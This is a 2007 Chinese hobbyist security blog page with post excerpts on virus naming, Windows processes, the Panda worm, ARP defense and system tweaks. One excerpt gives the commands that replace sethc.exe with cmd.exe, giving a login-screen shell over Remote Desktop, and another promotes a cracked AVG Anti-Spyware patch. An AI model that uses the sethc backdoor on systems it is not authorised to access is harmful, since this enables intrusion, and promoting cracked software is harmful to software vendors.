夜火博客 个人的碎碎念收集箱

如何根据名称识别计算机病毒

        夜火:经过前2天的熊猫变种worm.nimaya.al事件后,就一直想写个判断病毒类型名称什么的文章,给那个中毒的朋友看看,让中毒的那个朋友学学这方面的知识,好自己亲手解决以后碰到的病毒。今天在中关村在线看到了相关的这篇文章,写的比我想的要全面多了,就转过来了,给那个中毒的朋友,和其他需要的朋友学习学习。

        很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊?

  其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。

  世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。一般格式为:<病毒前缀>.<病毒名>.<病毒后缀>

.......................

缓冲区溢出光速入门PDF

前2天买到了《精通脚本黑客》《缓冲区溢出教程》,打算先看看精通脚本,然后在研究研究缓冲区溢出方面的知识,这个《缓冲区溢出光速入门》是在安全焦点上看到的,为以后的学习做点资料收集~

创建时间:2007-08-31 更新时间:2007-08-31
文章属性:原创
文章来源:www.xfocus.net
文章提交:watercloud (watercloud_at_xfocus.org)
缓冲区溢出光速入门.pdf
 

"爱国"病毒惊现互联网

  近日,互联网上出现了一种具有&ldquo;见机行事&rdquo;功能的病毒,与常见的电脑病毒不同的是,这种代码为Win32/KillDPT的病毒,会根据机器的操作系统类型决定中止运行还是入侵破坏,并被誉为&ldquo;专杀其它语种系统,是中国人就安全&rdquo;,以致部分网友惊呼&ldquo;病毒也爱国&rdquo;。

  &ldquo;愤青&rdquo;病毒除了放过简体中文操作系统,对英文系统也网开一面,不过会弹出&ldquo;Yourluck&rsquo;ssogood!&rdquo;的对话框。这显然是句中国式英语,字面直译应该是&ldquo;你运气真好&rdquo;。

系统进程与非系统进程的描述

system process进程文件: [system process] or [system process]进程名称: Windows内存处理系统进程描述: Windows页面内存管理进程,拥有0级优先。是否为系统进程: 是 alg.exe进程文件: alg or alg.exe进程名称: 应用层网关服务描述: 这是一个应用层网关服务用于网络共享。是否为系统进程: 是

标签: 安全Windows

作者:夜火 分类:技术文章 浏览:738 评论:0

熊猫烧香最新变种worm.nimaya.al

这2天事比较多,昨天网站因为非法内容从下午2点多停到晚上近7点,最后开通之后我又不得不把blog里的数据都过滤一遍,所有有可能被封的内容都给删了,其中有几个访问量很大的文章,也删了,导致blog已经达到5W的访问统计缩水到了3W,郁闷。 网上的一个朋友又中了毒,让我帮他看看。中毒原因是U盘感染,杀软里好像只有瑞星能查出来是worm.nimaya.al,熊猫的新变种,还能查出少量的downloader:trojan.dl.nimaya.c ,不得不说瑞星的杀软做的还是不错的~。

网页恶意代码的防疫

  很多情况下好多朋友都被恶意代码烦透了吧,我在各个安全网站到处漫游,看能不能帮大家一把,终于让我找到了这个好文章,大家可以参详一下。不过我开拓进取在这里提醒一下大家,在修改注册表之前一定要备份喔~并且要看准键咯~~`删错了可就……   一、 修改注册表:   我想大部份网友都有过被恶意代码修改过注册表的经历吧,有一招简单的方法是可以永远免疫的, 就是在注册表中删除恶意代码会用到的一个id就可以了, 那就是F935DC22-1CF0-11D0-ADB9-00C04FD58A0B,只要把它删了,那你以后碰到恶意代码,就再也不用担心注册表会再被修改了,它在注册表里面的路径是HKEY_CLASSES_ROOTCLSID{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} 找到后把整个项删掉就可以了,这个项删掉不会对系统有任何影响,请放心删除。(请注意不要删错了哦)

病毒修改系统时间后卡巴斯基不能使用的解决办法

  自从我用上卡巴斯基以后,几年来一直相信卡巴是最强悍的,百毒不侵,火眼金睛。。。。。。  前几天,用办公室的机器运行繁重任务,嫌开着卡巴的监控太慢,就把监控关闭了,然后上网时忘了开了,结果一会儿后机器突然中毒,屏幕上出现了好几个IE窗口(我平常只用MAXTHON的,从来不人工打开IE),内容都是些广告,同时防火墙报告有程序试图下载不明网站上的文件,机器的速度骤然慢得让人无法忍受。。。。。。...........................

WINDOWS系统进程知多少

  相信每一个从事计算机的人,都对众多系统关键服务与进程有所了解,但却不是每一个人都能详细说出这些进程,普通用户更是对众多的映象名称知之甚少。近日病毒的猖獗也使得部分用户大呼认识了进程就可以手动删除病毒,其实这样的想法都是片面的。从计算机病毒的发展来看,仅仅伪装系统关键进程或者创建新进程的病毒,几乎可能给用户造成任何影响。在此,笔者将详细介绍Windows操作系统进程的相关知识,使用户可以正确认识什么是进程,进程又都在做些什么。  认识计算机进程  进程是程序在计算机上的一次执行活动。当你运行一个程序,你就启动了一个进程。显然,程序是静态的,进程是动态的。进程可以分为系统进程和用户进程。凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身;用户进程就是所有由你启动的进程。进程是操作系统进行资源分配的单位。。。。。。。。。。。。。。。。。。

2000/xp/vista下5次shift的粘滞键利用

      这篇文章里说的方法和欠钱前2天说的用explorer.exe替换sethc.exe然后在3389下用5次shift获得资源管理器的方法差不多,不过做了一些扩展,蛮有意思~

  在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

  XP:

将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%system32dllcache
ren sethc.exe *.ex~
cd %widnir%system32
copy /y cmd.exe sethc.exe

  VISTA:

takeown /f c:windowssystem32sethc.exe
cacls c:windowssystem32sethc.exe /G administrator:F
然后按XP方法替换文件

用批处理文件抵御ARP攻击

  ARP欺骗通过伪造IP地址和MAC地址实现,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 笔者将介绍四种利用自制批处理文件来防御ARP攻击的方法。  一、把下面语句编成BAT处理文件      @echo off 。。。。。。。。。。。。。。。

AVG Anti-Spyware 7.5.1.43 完美破解汉化补丁

雅诗MM终于爆发了,出了AVG的完美破解汉化补丁(原来的反弹~),先感谢个说~

                

 

2007.9.24日最新发布
AVG Anti-Spyware  7.5.1.43 完美破解汉化补丁
请仔细按照我说明写的步骤去做!
破解更新后不会反弹!
AVG Anti-Spyware极致安全完美防护,针对因特网上传播的新一代安全威胁的有效解决方案。确保您的数据安全,保护您的隐私,抵御间谍软件,广告软件,木马,拨号程序,键盘记录程序和蠕虫的威胁。
在易于使用的界面之下,我们为您提供了高级的扫描和探测方式以及时下最尖端的技术。反病毒程序只能提供针对危急爆发的威胁如木马,蠕虫,拨号程序,劫持程序,间谍软件和键盘记录程序的有限的保护。

 

修改Win XP配置 不再越用越慢

  Windows XP的启动会有许多影响速度的功能,尽管ms说已经作过系统优化处理过,但对我们来说还是有许多可定制之处。我一般是这样来做的。   1、修改注册表的run键,取消那几个不常用的东西,比如Windows Messenger 。启用注册表管理器:开始→运行→Regedit→找到HKEY_CURRENT_USER Software Microsoft windows CurrentVersion Run MSMSGS /BACKGROUND 这个键值,右键→删除,世界清静多了,顺便把那几个什么cfmon的都干掉吧。   2、修改注册表来减少预读取,减少进度条等待时间,效果是进度条跑一圈就进入登录画面了,开始→运行→regedit启动注册表编辑器,找HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet ControlSession ManagerMemory Management Prefetch Parameters, 有一个键EnablePrefetcher把它的数值改为"1"就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。 .................

标签: 安全技巧

作者:夜火 分类:技术文章 浏览:823 评论:0